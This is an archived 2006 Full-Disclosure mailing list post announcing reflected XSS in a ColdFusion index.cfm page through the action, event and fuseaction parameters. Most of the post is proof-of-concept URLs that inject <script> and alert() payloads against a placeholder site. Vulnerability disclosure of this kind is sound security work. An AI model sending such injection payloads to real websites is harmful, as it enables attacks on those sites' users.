[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20060719131250.54352.qmail@web34301.mail.mud.yahoo.com>
Date: Wed, 19 Jul 2006 06:12:49 -0700 (PDT)
From: saied hackeriran <saiedhackeriran@...oo.com>
To: full-disclosure@...ts.grok.org.uk
Subject: New Ploblem in Index.cfm
In The Name Of God
Discoverer:SaiedHacker
Group:HackeranShiraz
Critical Level : Dangerous
This matter happens in index.cfm when
We want to run some specific Functions
Such as action,event,.... and hacker
Can start attacks such as XSS attack by
Using simple script or HtML code.
Exploit:
Http://www.Site.com/path/index.cfm?action=<script>
Http://www.Site.com/path/index.cfm?event=<script>
Http://www.Site.com/path/index.cfm?fuseaction=<script>
Xss:
Http://www.Site.com/path/index.cfm?action=<script>alert("SaiedHacker");</script>
Http://www.Site.com/path/index.cfm?event=<script>alert("SaiedHacker");</script>
Http://www.Site.com/path/index.cfm?fuseaction=<script>alert("SaiedHacker");</script>
Have fun
SaiedHackerIran@...oo.com
www.SaiedHackerPro.PersianBlog.com
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists